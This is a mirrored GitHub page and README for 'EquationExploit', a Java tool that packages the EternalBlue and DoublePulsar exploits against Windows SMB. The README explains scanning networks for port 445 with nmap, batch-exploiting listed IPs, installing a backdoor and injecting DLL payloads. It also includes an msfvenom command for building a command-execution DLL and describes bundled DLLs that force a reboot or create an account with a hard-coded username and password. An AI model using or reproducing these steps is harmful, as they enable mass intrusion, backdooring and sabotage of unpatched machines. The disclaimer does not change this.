https://github.com/1135/EquationExploit
Eternalblue Doublepulsar exploit
https://github.com/1135/EquationExploit
Last synced: 4 months ago
JSON representation
Eternalblue Doublepulsar exploit
- Host: GitHub
- URL: https://github.com/1135/EquationExploit
- Owner: 1135
- License: mit
- Created: 2017-05-03T07:26:57.000Z (over 8 years ago)
- Default Branch: master
- Last Pushed: 2018-07-29T02:19:10.000Z (over 7 years ago)
- Last Synced: 2024-08-05T17:27:46.010Z (over 1 year ago)
- Language: Java
- Size: 23.3 MB
- Stars: 92
- Watchers: 7
- Forks: 44
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
- awesome-hacking-lists - 1135/EquationExploit - Eternalblue Doublepulsar exploit (Java)
README
# EquationExploit
Eternalblue Doublepulsar exploit
### Disclaimer
This program is only for testing security and you must comply with local laws. Otherwise, please immediately turn off and delete the program.
### Usage
```
java -jar EquationExploit-1.0-SNAPSHOT-jar-with-dependencies.jar
```
###### Batch use
ip.txt
```
192.168.0.3
```
----
# 中文README
### 免责声明
此程序仅用于测试安全性,您必须遵守当地法律。 否则,请立即关闭并删除程序。
### 扫描目标主机
可借助nmap 扫描445端口开放的主机
`nmap 192.168.0-255.0/24 -p 445 --open`
### 用法
start.bat打开即可。
或自己输入:
```
java -jar EquationExploit-1.0-SNAPSHOT-jar-with-dependencies.jar
pause
```
所有选项都有默认项,回车键即可。
#### 选项 - 选择exploit
注意顺序
Eternalble:安装backdoor
Doublepulsar:执行相关操作
#### 选项 - 批量利用
两个exploit都有这个选项:
```
input TargetIpAddress or list (Default. The 'list' will use ip.txt):
```
在这一步除非输入IP地址,否则默认为批量利用:依次测试ip.txt中的ip
内容格式:一行一个ip
```
192.168.0.2
192.168.0.3
```
#### 选项 - payloadDllname指定注入目标机目标进程的dll文件
* dll跟目标机系统架构有关:x86用x86的dll文件,x64用x64的dll文件
* 文件夹dlls中自带了一些dll文件(附说明),程序默认Rundll的载荷为x64createSysUser.dll
* 在Dlls文件夹中放入自己的dll文件,如x.dll 在程序中输入x.dll即可
可使用msfvenom生成DLL(CMD可指定需要执行的命令):
```
Msfvenom –platform Windows -p windows/x64/exec -f dll -o /tmp/exec.dll CMD=calc
```
#### dll功能说明
* X64reboot.dll X86reboot.dll
```
shutdown -r -f -t 00
```
立即重启计算机
:将显示窗口
标题为"您将要被注销"
Windows将在一分钟内关闭。
* x64createSysUser.dll x86createSysUser.dll
创建用户(UAC机制导致仅能在管理员权限执行成功)
```
f4ck
f4ckworld
```